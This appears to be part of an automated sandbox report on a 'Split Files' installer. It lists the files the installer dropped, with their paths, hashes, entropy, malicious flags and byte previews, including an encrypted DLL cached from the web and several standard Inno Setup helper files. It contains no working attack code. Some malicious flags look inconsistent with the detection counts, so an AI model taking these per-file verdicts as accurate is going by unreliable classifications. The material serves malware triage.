Preview:	[Interface]....MFile->Caption = '&Archivo'..MExit->Caption = 'Salir'..MOptions->Caption = 'Options'..MSettings->Caption = 'Herramientas'..MLanguage->Caption = 'Elegir idioma'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Holand.s'..MLangEnglish->Caption = 'Ingl.s'..MLangFrench->Caption = 'Franc.s'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Ruso'..MLangSpanish->Caption = 'Espa.ol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Ayuda'..MAbout->Caption = 'Sobre programa'....TabSheetSplit->Caption = 'SEPARAR'..TabSheetCombine->Caption = 'JUNTAR'....GroupBoxCombine->Caption = ' Drag and drop una de las partes para juntar en la celda 'Primera Parte' o navegar '..LabelFirstFile->Caption = 'Primera Parte:'..LabelOutput->Caption = 'Nombre Archivo salida:'..LabelCombineFolder->Caption = 'Carpeta salida:'..LabelSplitFolder->Caption = 'Carpeta salida:'..ButtonCombine->Caption = 'JUNTAR'..ButtonStopCombine->Caption = 'PARAR'....

C:\Program Files (x86)\Split Files\language\is-7L4JB.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2345
Entropy (8bit):	5.847861612631974
Encrypted:	false
SSDEEP:	48:HGj2lE8qiTh7XJ9zHadtPTTD1n34q1jgun1ITq8K:HG5RDTln34qRgusK
MD5:	A5C9FEA89EFE8E2162BA477E8EA39B44
SHA1:	E6A2042C574D14786891F0C32F92C8292BBB4ACA
SHA-256:	8DDFB50DACA491296101BAB3DB9B77C7587127E684D9E22EFD6DC93F84A008FA
SHA-512:	3F7944F262717D308A1235982E741536DA6A4DF9ABEE4E2811E1151B53C3D31811EA3EB750ED39F347F7DF14AD20FF981C85CC2DA297BE745547B36D41B8FDB9
Malicious:	false
Preview:	[Interface]....MFile->Caption = '...(&F)'..MExit->Caption = '.......'..MOptions->Caption = '...'..MSettings->Caption = '....'..MLanguage->Caption = '....'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = '........'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '....'..MAbout->Caption = '....'....TabSheetSplit->Caption = '...'..TabSheetCombine->Caption = '...'....GroupBoxCombine->Caption = ' .......... "......" .............'..LabelFirstFile->Caption = '......'..LabelOutput->Caption = '..........'..LabelCombineFolder->Caption = '.........'..LabelSplitFolder->Caption = '.........'..ButtonCombine->Caption = '...'..ButtonStopCombine->Caption = '..'....GroupBoxSplit->Caption = ' .......... "......."............. '..LabelFileName->Caption = '.

C:\Program Files (x86)\Split Files\language\is-7O3KV.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2729
Entropy (8bit):	5.029883215699414
Encrypted:	false
SSDEEP:	48:HGgS7++sqMsmQYEJK7bHExsA9GZ1MTn6btlOWH6r3zvX5c9WYN:HGjUoR9GXML6RYWH6rDRdYN
MD5:	8AFE543CB6791AA250312EBA61BF7C13
SHA1:	BFD229D43BE86728A634055AD65860157C2671BD
SHA-256:	AF5BFB663E715C48C55E24BC3BEA30FCAA9BE8EAF35133FBB75D54C5735696AC
SHA-512:	5CF85F84DD6D363B2AAC720CF10C5289350EB706DC2BF5CA824CF220C3607CC7969CDD2F4B2912DC97C7BE50CEDC24A9A01AFC585CE84B6B8CB81419153931A2
Malicious:	false
Preview:	[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Termina programma'..MOptions->Caption = 'Options'..MSettings->Caption = 'Impostazioni'..MLanguage->Caption = 'Seleziona Lingua'..MLangArabic->Caption = 'Arabo'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Olandese'..MLangEnglish->Caption = 'Inglese'..MLangFrench->Caption = 'Francese'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Russo'..MLangSpanish->Caption = 'Spagnolo'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aiuto'..MAbout->Caption = 'Informazioni'....TabSheetSplit->Caption = 'DIVIDI'..TabSheetCombine->Caption = 'UNISCI'....GroupBoxCombine->Caption = ' Drag and drop una delle parti da unire nella casella 'Prima Parte' o segui percorso '..LabelFirstFile->Caption = 'Prima Parte:'..LabelOutput->Caption = 'Nome File Uscita:'..LabelCombineFolder->Caption = 'Cartella Uscita:'..LabelSplitFolder->Caption = 'Cartella Uscita:'..ButtonCombine->Caption = 'UNISCI'..ButtonStopCombine->Caption = '

C:\Program Files (x86)\Split Files\language\is-8E2LT.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2687
Entropy (8bit):	5.051567814097503
Encrypted:	false
SSDEEP:	48:HGgXRVA+sqgh59WJIo4yvHIExBMHkWREHZDNbHBsBOtiSZls5crRMfiE:HGusSgEvMHfREHN9hsoiOUBiE
MD5:	D2471D35D833E2544D67365E015E6153
SHA1:	497EE8FF9519D025BD10C5AA15DDC34DFB1B334B
SHA-256:	4831DDBCFE327E2542F4565E7A948C5828D71003B8444723E1E11BA6BB43ACE7
SHA-512:	C82B30D604A679F87B8D0B1670A0D1607E25150FFCFD1C9E631241916BA93CEB5A33AFCAA9080149096ACA1913791384860F5699F2BB302B6CB190AF777EB3CE
Malicious:	false
Preview:	[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Programma Afsluiten'..MOptions->Caption = 'Options'..MSettings->Caption = 'Instellingen'..MLanguage->Caption = 'Kies Taal'..MLangArabic->Caption = 'Arabisch'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Nederlands'..MLangEnglish->Caption = 'Engels'..MLangFrench->Caption = 'Frans'..MLangItalian->Caption = 'Italiaans'..MLangRussian->Caption = 'Russisch'..MLangSpanish->Caption = 'Spaans'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Hulp'..MAbout->Caption = 'Info'....TabSheetSplit->Caption = 'SPLITSEN'..TabSheetCombine->Caption = 'HERENIGEN'....GroupBoxCombine->Caption = ' Drag and drop een van de te herenigen delen in 'Eerste Deel' of browse ernaartoe '..LabelFirstFile->Caption = 'Eerste Deel:'..LabelOutput->Caption = 'Output Bestandsnaam:'..LabelCombineFolder->Caption = 'Output Map:'..LabelSplitFolder->Caption = 'Output Map:'..ButtonCombine->Caption = 'HERENIGEN'..ButtonStopCombine->Caption = 'STOP'....Grou

C:\Program Files (x86)\Split Files\language\is-APJVT.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2594
Entropy (8bit):	5.044497576650396
Encrypted:	false
SSDEEP:	48:HGgb5l+sqiTh7XJ9oVHo1xx0GHLVQ4ZWGAtDAEQmUDcQdWym:HGdpa1jfHLVQ4AGAtWma8H
MD5:	76776746B3CFF1CBD5D56CD44CA2DEF5
SHA1:	2F2ECA50BD7F72232BE84291EF1A7956C24098CC
SHA-256:	EC647D30931F50607CF745D958AAF0367CCEAB9999346188255CFBFB22301EE3
SHA-512:	202436C708D4F34FFCCDC3D33841246C5CEE073AC270DA547C15F9E995A08D36AE4C00982283BF60D62363046BBEAA0125D59075E4629A9D1934039CBFB00BE5
Malicious:	false
Preview:	[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Exit Application'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Language'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Help'..MAbout->Caption = 'About'....TabSheetSplit->Caption = 'SPLIT'..TabSheetCombine->Caption = 'JOIN'....GroupBoxCombine->Caption = ' Drag and drop one of the files to join in the 'First Part' box or browse to it '..LabelFirstFile->Caption = 'First Part:'..LabelOutput->Caption = 'Output File Name:'..LabelCombineFolder->Caption = 'Output Folder:'..LabelSplitFolder->Caption = 'Output Folder:'..ButtonCombine->Caption = 'JOIN'..ButtonStopCombine->Caption = 'STOP'....GroupBoxSplit->Caption = ' Drag

C:\Program Files (x86)\Split Files\language\is-B20UO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2607
Entropy (8bit):	5.234177949162883
Encrypted:	false
SSDEEP:	48:HGUyjEiB0w3l+sqiTh7XJ9UeHjIDt00AoB/nheSSMpSSSxPYe:HGpNBrkGIDt0qnheS9Sx
MD5:	E1271E0DDD609CD7F9C2367D32FEBE4B
SHA1:	0A420424F1FADE0BFF002E63AAD22B5E94B86CAC
SHA-256:	AEE6B1EDFFFCE507E2207C7E2AA36DA42B2AC54CEB28B9759B2D05F1012CBA8F
SHA-512:	86A11C9E4B59F2437180F56CAD44E69CB29B03B93983EA5E35CBCC5BDD40CFC424EE1EEF519B2E44D67623C79835AF92B4B089AC29890C046CD590C1F8BFA574
Malicious:	false
Preview:	[Interface]....MFile->Caption = '&Dosya'..MExit->Caption = 'Uygulamay. Kapat'..MOptions->Caption = 'Se.enekler'..MSettings->Caption = 'Ayarlar'..MLanguage->Caption = 'Dil'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Yard.m'..MAbout->Caption = 'Hakk.nda'....TabSheetSplit->Caption = 'PAR.ALA'..TabSheetCombine->Caption = 'B.RLE.T.R'....GroupBoxCombine->Caption = ' .lk par.ay. s.r.kleyin yada g.zat. kullan.n '..LabelFirstFile->Caption = '.lk Par.a:'..LabelOutput->Caption = 'Birle.tirme Ad.:'..LabelCombineFolder->Caption = '..kt. Klas.r.:'..LabelSplitFolder->Caption = '..kt. Klas.r.:'..ButtonCombine->Caption = 'B.RLE.T.R'..ButtonStopCombine->Caption = 'DUR'....GroupBoxSplit->Caption = ' B.lmek istedi.iniz dosyay.

C:\Program Files (x86)\Split Files\language\is-FBKGV.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2299
Entropy (8bit):	5.691502190790686
Encrypted:	false
SSDEEP:	48:HG9uhjkDYhqGQjsONHiHQgGU9dm6nclk6a1hg22mo6LD:HGnzLIQTUPmcclGsmogD
MD5:	F9F47FF3D866FFC4F38E315E41356E55
SHA1:	EFC313A99993B5FB8A454D4C5197C6F3965B5C89
SHA-256:	3A13CCE54190BF4A679D21F61466A0A18E9340287CAA1AA4EACB38C99C9D4957
SHA-512:	6EC1F1E19921C535A50254500ED01602DA74D3CC9E6DA8B5FC78D89255E42C5968BD294E56F584EE273630B9233C20CAFEBC906354CE393FE1CFFE91528F527A
Malicious:	false
Preview:	[Interface]....MFile->Caption = '&....'..MExit->Caption = '.....'..MOptions->Caption = '.....'..MSettings->Caption = '.........'..MLanguage->Caption = '....'..MLangEnglish->Caption = '..........'..MLangRussian->Caption = '.......'..MLangArabic->Caption = '........'..MLangChinese->Caption = '.........'..MLangDutch->Caption = '.......'..MLangFrench->Caption = '...........'..MLangItalian->Caption = '...........'..MLangSpanish->Caption = '.........'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '......'..MAbout->Caption = '. .........'....TabSheetSplit->Caption = '.......'..TabSheetCombine->Caption = '.......'....GroupBoxCombine->Caption = ' ....... ..... '..LabelFirstFile->Caption = '1-. ....:'..LabelOutput->Caption = '........: '..LabelCombineFolder->Caption = '..........:'..ButtonCombine->Caption = '.......'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = ' ....... .... '..LabelSplitFolder->Caption = '..........:'..LabelFileName->Caption = '... .....:'..LabelFile

C:\Program Files (x86)\Split Files\language\is-JMARM.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2266
Entropy (8bit):	5.4593359267896355
Encrypted:	false
SSDEEP:	48:HG8il+sqirh7zJ9YTHskp1r4phFAqLNnK9h:HGkSkp1r4NTKf
MD5:	4ABA9765EB3555788F5706D87A9D2DCA
SHA1:	36C0895FBF9F99690CA55C54CC56310E24513113
SHA-256:	E99B943206594C04BC0383669D04D4F191A501F46D2474FED08B997F8020B433
SHA-512:	3498485635AFC548663715D22071611BAB10C707E8E24BE0B5143EE4A27727DA7D18A5E6959E3F6DD7D0F615DDFD50CE9FC5CE8AE6DDC5BEE287B5A00A817288
Malicious:	false
Preview:	[Interface]....MFile->Caption = '...'..MExit->Caption =' ....'..MOptions->Caption = 'Options'..MSettings->Caption =' .........'..MLanguage->Caption =' ......'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption =' .......'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = '....'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption =' .......'..MAbout->Caption =' ...'....TabSheetSplit->Caption = ' ... .......'..TabSheetCombine->Caption = ' ...'....GroupBoxCombine->Caption =' ... .......'..LabelFirstFile->Caption = '..... .....:'..LabelOutput->Caption = '... ....:'..LabelCombineFolder->Caption =' .... ......:'..LabelSplitFolder->Caption = '.... ......:'..ButtonCombine->Caption =' ...'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = '... .......'..LabelFileName->Caption =' ..... ...: '..LabelSplitFolder->Caption =' .... ......:'

C:\Program Files (x86)\Split Files\language\is-R2P47.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2507
Entropy (8bit):	5.040552699764577
Encrypted:	false
SSDEEP:	48:HGkOA+sq/W7Yve3EkHaBSDbSljMM+v1/D3H:HGb8hABSDbSJMBD
MD5:	336D33F55222F48FBA19EF0911732766
SHA1:	E17A78E3B48192361DB540B1E8C9D0548C9A9FFE
SHA-256:	0E955453FA27CED0D0521F0F960C7743C2090F06263D33EC8FA978B681123E0C
SHA-512:	67EC6B859BCDD66DA59CDB1DC1A4EACFBDA12C57699012EE1573DD88F5AAAB6288E1BD9015C862689F4A1A27E83B28C3A9C99B1895EDF4F47D6F94B0557CDC1F
Malicious:	false
Preview:	[Interface]....MFile->Caption = '&Fichier'..MExit->Caption = 'Quitter'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Langage'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Flamand'..MLangEnglish->Caption = 'Englais'..MLangFrench->Caption = 'Francais'..MLangItalian->Caption = 'Italien'..MLangRussian->Caption = 'Russe'..MLangSpanish->Caption = 'Espagnol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aide'..MAbout->Caption = 'A propos de ..'....TabSheetSplit->Caption = 'Scinder'..TabSheetCombine->Caption = 'Assembler'....GroupBoxCombine->Caption = ' Faire glisser un des fichiers bloc . assembler ou rechercher le par ... '..LabelFirstFile->Caption = 'Premier Fichier:'..LabelOutput->Caption = 'Fichier de sortie: '..LabelCombineFolder->Caption = 'R.pertoire Dest.'..LabelSplitFolder->Caption = 'R.pertoire Dest.'..ButtonCombine->Caption = 'Assembler'..ButtonStopCombine->Caption = 'Stop'....GroupBoxSpl

C:\Program Files (x86)\Split Files\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	InnoSetup Log Split Files {215D64A9-0240-4952-9F4D-4D0A65391F2C}, version 0x2a, 4441 bytes, 927537\user, "C:\Program Files (x86)\Split Files"
Category:	dropped
Size (bytes):	4441
Entropy (8bit):	4.697339464808845
Encrypted:	false
SSDEEP:	48:kHED69yMlLBv8rD85pPmUIrBdcoINLFhqkLVO3471hD5WpPLDfDxLDvvDHD1DoDs:k7VZp8rD85pPmaoINFhqYOIhHeSk9WI
MD5:	35B9424FD3C02A2403561DA3E5D80E26
SHA1:	B944DC166C6A5BE77937B09B3E67175C422B4337
SHA-256:	B430632DBF9232BCC488DFD294297D1A197A832FB83333C6C601D7E41A587DBE
SHA-512:	1028FFD68185DA62C2A64B1D699733F89116AA8006CBB93B80609D675E02A80E9ACC2190E22F00CCE6B1F1168875354F855DBE750B67DC4DE8F2853FA9C8D0E7
Malicious:	false
Preview:	Inno Setup Uninstall Log (b)....................................{215D64A9-0240-4952-9F4D-4D0A65391F2C}}.........................................................................................Split Files.....................................................................................................................*.......Y...%..................................................................................................................`....r.............C....927537.user"C:\Program Files (x86)\Split Files.........../...P.. ..........R.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..'...dll:kernel32.dll.CreateFileA.............#...dll:kernel32.dll.WriteFile...........!...dll:kernel32.dll.CloseHandle.......!...dll:kernel32.dll.ExitProcess.......$...dll:User32.dll.GetSystemMet

C:\Program Files (x86)\Split Files\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	789258
Entropy (8bit):	6.369988626022893
Encrypted:	false
SSDEEP:	12288:EpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOU:emt2bfrP437QzH/A6A7E7dVPUxOU
MD5:	D3BA43B9E1B3838F28AFC558F2991D5B
SHA1:	1132F1C76760281A591F7DF99D592283103FCC87
SHA-256:	1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
SHA-512:	870371843F59B91D75B6C4D4C637075235D25CF3ABB059B58E39F9CD2833533A8F434307E7AD1175FD45082D3B4E4F0ED79F303ED77DEF553587E2819C092022
Malicious:	true
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\Split Files\webpage.url (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	MS Windows 95 Internet shortcut text (URL=<http://www.altarsoft.com/split_files.shtml>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	5.12302231676258
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/0S4UEtSNM5LTJOBCBuQpQQXXy:HRYFVm/r4UEtSeVTJuZQplHy
MD5:	DCD6923B008121BFF4C7C0AA1206286E
SHA1:	AD4EF16A96A80C8EA5DBC5933229580BC6C332E0
SHA-256:	E1E01BFA5E2B5A117A627F7E9E861CF63D852A66BCE0DF88094D59CAF61E4376
SHA-512:	EC4A399EB38A1FA64DF8990708168F134ACD0CA793930E57C6D3A260A537B20DFD9F8B7232987F32EC1C1A7CEC7EC91F15A644A63D275104D96588FC3D354B5C
Malicious:	false
Preview:	[InternetShortcut]..URL=http://www.altarsoft.com/split_files.shtml..Modified=500425EA770BCC01B2..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\fuckingdllENCR[1].dll

Download File

Process:	C:\Program Files (x86)\Split Files\SplitFiles131.exe
File Type:	data
Category:	dropped
Size (bytes):	94224
Entropy (8bit):	7.998072640845361
Encrypted:	true
SSDEEP:	1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
MD5:	418619EA97671304AF80EC60F5A50B62
SHA1:	F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
SHA-256:	EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
SHA-512:	F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
Malicious:	false
Preview:	...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.\|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..\|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=\|....'....[1.~.YB:./...A`...=..F..K...........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\count[1].htm

Download File

Process:	C:\Program Files (x86)\Split Files\SplitFiles131.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\library[1].htm

Download File

Process:	C:\Program Files (x86)\Split Files\SplitFiles131.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\library[1].htm

Download File

Process:	C:\Program Files (x86)\Split Files\SplitFiles131.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\ping[1].htm

Download File

Process:	C:\Program Files (x86)\Split Files\SplitFiles131.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.1751231351134614
Encrypted:	false
SSDEEP:	3:nCmxEl:Cmc
MD5:	064DB2A4C3D31A4DC6AA2538F3FE7377
SHA1:	8F877AE1873C88076D854425221E352CA4178DFA
SHA-256:	0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
SHA-512:	CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
Malicious:	false
Preview:	UwUoooIIrwgh24uuU

C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_iscrypt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8818118453929262
Encrypted:	false
SSDEEP:	24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5:	A69559718AB506675E907FE49DEB71E9
SHA1:	BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:	2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:	E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	4.226829458093667
Encrypted:	false
SSDEEP:	48:6Q5EWGg69eR+Xl4SH8u09tmRJ/tE/wJI/tZ/P8sB1a:32Gel4NP9tK2/wGXhHa
MD5:	9E5BA8A0DB2AE3A955BEE397534D535D
SHA1:	EF08EF5FAC94F42C276E64765759F8BC71BF88CB
SHA-256:	08D2876741F4FD5EDFAE20054081CEF03E41C458AB1C5BBF095A288FA93627FA
SHA-512:	229A9C66080D59B7D2E1E651CFF9F00DB0CBDC08703E60D645651AF0664520CA143B088C71AD73813A500A33B48C63CA1795E2162B7620453935A4C26DB96B21
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........o4...g...g...g).zg...g...g...g.&lg...g.&yg...gRich...g........PE..d...9TTB..........#...........................@..............................P...............................................................!..x............@..H.................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...,....0......................@....pdata..H....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

